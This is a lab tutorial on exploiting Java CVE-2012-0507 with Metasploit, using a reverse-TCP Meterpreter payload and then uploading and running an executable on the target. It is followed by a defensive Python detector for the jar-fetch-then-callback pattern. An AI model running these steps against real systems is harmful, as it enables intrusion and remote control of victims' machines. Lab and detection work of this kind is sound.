How to Hack Remote Computer using Metasploit by exploiting Java Vulnerability

In this post I am going to demonstrate how to use the Metasploit tool to exploit the popular Java AtomicReferenceArray Type Violation vulnerability (CVE-2012-0507).

Requirements:

VirtualBox
Target OS (Windows, ...)
PenTesting Distro (BackTrack)
JRE 6 (unpatched version)

I am assuming you already know how to set up virtual machines, how to install BackTrack, etc.

Part I: Preparing the Target Machine:
Start the "Target" Machine.
Install the JRE 6.

Part II: Preparing the PenTesting Machine:
Now, start the BT5.

Open the Terminal and type "msfupdate". This will update the Metasploit Framework (MSF) with the latest exploits and payloads. As CVE-2012-0507 is one of the latest vulnerabilities, you have to update the MSF before proceeding further.

Part III: Exploiting the Java AtomicReferenceArray Type Violation Vulnerability:

Step 1:
Open the Terminal and type "msfconsole". This will bring up the Metasploit console, where you can interact with the MSF.

Step 2:
Type "use exploit/multi/browser/java_atomicreferencearray". This command selects the java_atomicreferencearray.rb module for the attack.

Now type "show options" to display which settings are available and/or required for this specific module.

Then type "set SRVPORT 80" and "set URIPATH /".

Step 3: Set Payload
Type "show payloads"; this will display the list of payloads. We are going to use the 'reverse_tcp' payload. This payload makes the Target open a reverse TCP connection back to the PenTesting machine.

Type 'set payload java/meterpreter/reverse_tcp' in the console.

set LHOST [IP_address]: In order to get the reverse connection, we have to set our IP in LHOST.

Open the Terminal and type "ifconfig". This will display the IP info of our PenTesting machine. The IP will be "192.168.56.x". For example, let us say the IP is 192.168.56.10.

Now type "set LHOST 192.168.56.10" in the msfconsole.

Part IV: Breaching the Target Machine:

So, are you ready?! Let us break into the Target machine.

Step 1:
Type "exploit" in the msfconsole. This will start the reverse handler on our machine, and it will wait for anyone to connect to our HTTP server (e.g. http://192.168.56.10/). Once the victim connects to our server, it will send a jar file that exploits the CVE-2012-0507 vulnerability.

Step 2:
Open Firefox/IE on the Target machine.
Enter "http://192.168.56.10/".
The page loads nothing visible, but the exploit will run in the background.

Step 3:
Go back to the BT5 machine.

Now type "sessions"; this will show the list of active sessions.

Type "sessions -i 1"; this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact with and control the Target.

Step 4: Upload files
We got a backdoor to the Target machine :), and now we can run any commands on the Target.

For example, typing 'sysinfo' will display the system information.

You can also upload and execute your own executable files on the Target machine.

"upload /Test.exe c:\\": this command will upload Test.exe from the root folder of the BT5 file system to the C drive of the Target.

"execute -f C:\\Test.exe": this command will run our uploaded file on the Target.

There you have it. Now you are in the remote computer and you can do pretty much anything :)
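
A defender's view of the same lab, as an added example that is not part of the original post: the sequence above (the Target's Java runtime fetches a jar over HTTP, then opens a TCP connection back to the same host) can be spotted by correlating proxy and flow logs. The log layouts, the 60-second window, the sample records and the function names are assumptions constructed for illustration.

```python
import csv
import io
import re
from datetime import datetime, timedelta

# Constructed sample records (not from the original post).
# Proxy log columns: time, client, server, port, path, content type, user agent
HTTP_LOG = """\
2012-04-02T10:15:01,192.168.56.20,192.168.56.10,80,/,text/html,Mozilla/5.0 Firefox/11.0
2012-04-02T10:15:03,192.168.56.20,192.168.56.10,80,/x.jar,application/java-archive,Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_30
2012-04-02T10:20:00,192.168.56.21,192.168.56.30,80,/app/tool.jar,application/java-archive,Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_30
"""
# Flow log columns: time, source, destination, destination port
FLOW_LOG = """\
2012-04-02T10:15:05,192.168.56.20,192.168.56.10,4444
2012-04-02T10:45:00,192.168.56.21,192.168.56.30,8443
"""

JAVA_UA = re.compile(r"\bJava/\d")   # user agent sent by the Java runtime itself
WINDOW = timedelta(seconds=60)       # assumed correlation window

def rows(text):
    return [r for r in csv.reader(io.StringIO(text)) if r]

def jar_fetches(http_log):
    """Yield (time, client, server, port) for Java code fetched by a Java runtime."""
    for ts, client, server, port, path, ctype, ua in rows(http_log):
        java_code = ctype == "application/java-archive" or path.endswith((".jar", ".class"))
        if java_code and JAVA_UA.search(ua):
            yield datetime.fromisoformat(ts), client, server, int(port)

def correlate(http_log, flow_log):
    """Alert when a jar fetch is followed by a connection to the same host on another port."""
    fetches = list(jar_fetches(http_log))
    alerts = []
    for ts, src, dst, dport in rows(flow_log):
        seen = datetime.fromisoformat(ts)
        for fetched, client, server, http_port in fetches:
            same_pair = (src, dst) == (client, server)
            in_window = timedelta(0) <= seen - fetched <= WINDOW
            if same_pair and in_window and int(dport) != http_port:
                alerts.append((client, server, int(dport), (seen - fetched).total_seconds()))
    return alerts

if __name__ == "__main__":
    for alert in correlate(HTTP_LOG, FLOW_LOG):
        print("ALERT client=%s server=%s callback_port=%d delay=%.0fs" % alert)
```

The second jar download in the sample data is not flagged, because the later connection from that client falls outside the window.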
